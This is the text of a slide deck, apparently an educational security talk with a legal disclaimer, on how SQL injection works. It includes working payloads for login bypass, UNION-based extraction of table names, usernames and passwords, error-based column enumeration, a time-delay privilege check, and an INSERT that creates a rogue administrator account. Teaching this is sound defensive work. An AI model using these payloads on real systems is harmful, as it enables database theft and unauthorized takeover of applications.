How Did I Steal Your DatabaseMostafa Siraj

Application Security Expert

DISCLAIMER

Hacking websites is ILLEGAL

This presentation is meant for educational purposes ONLY

Only use this stuff on YOUR website and YOUR account

Nearly all applications rely on a Datastore

What is Database

• A Collection of Tables (Users, Orders, Countries,..etc)

• The tables are a collection of columns/rowsUsername Password First_Na

meLast_Name

Email IsAdmin

Elprince Elprince123

Ahmed ElMasry elprince123@example.com

Yes

ElnegmTamer

Password123

Tamer Tamer Tamer123@example.com

No

…… ….. …… …… ……`

What is SQL

• A query language that allows interacting with the database

• SQL can

– Retrieve data from the database

– Insert new records in the database

– Delete records from the database

– Update records in the database

SQL Queries

• To get all data about Username elprince:

SELECT Username,Password, First_Name,Last_Name, Password

FROM Users

WHERE Username=‘elprince’

• Gives a result:

Elprince Elprince123 Ahmed ElMasry elprince123@example.com

FACT

• Amongst Codd's rules for a Relational Database:

– Metadata must be stored in the database just as regular data is

SQL Injection

• is a technique where an attacker creates or alters existing SQL commands

– Expose hidden data (e.g. steal all the records from the tables)

– Override the data (e.g. Administrators password)

– Execute dangerous system level commands on the database host

SQL Injection Login Example

SELECT * FROM Users WHERE Username=‘username’ AND Password=‘password’

• If the user entered Elprince, Elprince123 the query will be

SELECT * FROM Users WHERE Username=‘Elprince’ AND Password=‘Elprince123’

SQL Injection Ex Cont

• Suppose the User entered ‘ OR 1=1--, 123 the query will be

SELECT * FROM Users WHERE

Username=‘‘ OR 1=1--’ AND Password=‘123’

• -- comments everything afterwards, so the query will be

SELECT * FROM Users WHERE

Username=‘‘ OR 1=1--

This is not enough

• You can enhance the injection to login with the administrator account

Enter ‘ or 1=1 ORDER BY 1--, abc the query will be

SELECT * FROM Users WHERE

Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’

Finding SQL Injection Bugs

• Submit single quotation mark and observe the result

• Submit two single quotations and observe the result

Finding SQL Injection Bugs

• For multistate processes, complete all the states before observing the results

• For search fields try using the wildcard character %

Finding SQL Injection Bugs

• For numeric data, if the original value was 2 try submitting

1+1 or 3-1

• If successful try using SQL-specific keywords, e.g.

67-ASCII(‘A’)

• If single quotes are filtered try

51-ASCII(1) [note ASCII(1)=49]

Identify the database engine

• The error messages will let us know the DB engine

• We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)

Identify the database engine

•Use specific characters or commands:

String concatenation in different DB engines

: ‘||’FOO

: ‘+’FOO

: ‘ ‘FOO *note the space btw the 2 quotes]

Identify User privileges

• ‘ and 1 in (SELECT user) --

• ‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--

Injection in Search Fields

35

Entering Normal Input

Search Results

Trying Single Quote

I receive this error

Error states that it’s

Suppose I still don’t know the DB engine, Is it

Note: string concatenation in is +

I’m having an error, it’s not

Is it

Note: string concatenation in Oracle is ||

Different error, still not

Is it

Note: string concatenation in MySQL is blank space

It’s

The query in the backendis something like that

SELECT …,…,…,…,…

FROM ….

WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE….

A possible location for my input

The Strategy

1. Get number of items after the SELECT statement

SELECT …,…,…,…,…

FROM ….

WHERE ….=…. AND ….!=….. OR …..>……

How many items are here

The Strategy

2. Identify the location of the STRINGS in the SELECT Statement

SELECT …,…,…,…,…

FROM ….

WHERE ….=…. AND ….!=….. OR …..>……

Which of those are strings

The Strategy

3. Get the Structure of the database

SELECT …,…,…,…,…

FROM ….

WHERE …. UNION

SELECT ….,TableNames,….,….,…

FROM DatabaseStructure --=…. AND ….!=….. OR …..>……

The Strategy

4. Get the data from the database

SELECT …,…,…,…,…

FROM ….

WHERE …. UNION

SELECT ….,Usernames,….,….,…

FROM Users --=…. AND ….!=….. OR …..>……

The Strategy

1. Get number of items after the SELECT statement

2. Identify the location of the STRINGS in the SELECT Statement

3. Get the Structure of the database

4. Get the data from the database

1. Get number of items after the SELECT statement

Error

Try another number

Result

Why the results are less?

Try another number

Error, it’s not 8

Let’s try 7

Result

How many columns do we have in the SELECT statement

The Strategy

1. Get number of items after the SELECT statement

2. Identify the location of the STRINGS in the SELECT Statement

3. Get the Structure of the database

4. Get the data from the database

2. Identify the location of the STRINGS in the SELECT Statement

1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#

Result

Get the Strings and the locations

1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#

Result

The Strategy

1. Get number of items after the SELECT statement

2. Identify the location of the STRINGS in the SELECT Statement

3. Get the Structure of the database

4. Get the data from the database

3. Get the Structure of the database

1234') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULLFROM information_schema.tables#

Result

The Strategy

1. Get number of items after the SELECT statement

2. Identify the location of the STRINGS in the SELECT Statement

3. Get the Structure of the database

4. Get the data from the database

Next Queries

1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROM information_schema.columns where table_name=‘USERS'#

1234') UNION SELECTNULL,NULL,NULL,username,password,null,nullFROM users WHERE id<100#

…….

Continue till you get all the tables

The Strategy

1. Get number of items after the SELECT statement

2. Identify the location of the STRINGS in the SELECT Statement

3. Get the Structure of the database

4. Get the data from the database

Injection with errors

Gives me an Error

Getting version

' and 1 in (SELECT @@version)--

Gives me this error

Getting Column names

I get this Error

Getting next column name

' group by login.firstname having 1=1--

I get this error

Again

' group by login.firstname, login.surname having 1=1--

Error reveals new column name

Again

' group by login.firstname, login.surname,login.username having 1=1--

New column name

Continue…

Continue…

Continue…

• After getting all of the columns I found a field called IsAdmin -that’s my goal -

• Putting the following query creates an admin account on the application

‘; INSERT INTO Login

(username,pwd,IsAdmin,……)

VALUES

(‘Administrator’,’******’,TRUE,…..)

Not all Injections generate errors

DEMO

SQLMap

You Were GREAT Audience

Thank You

@mostafasiraj

Mostafa Siraj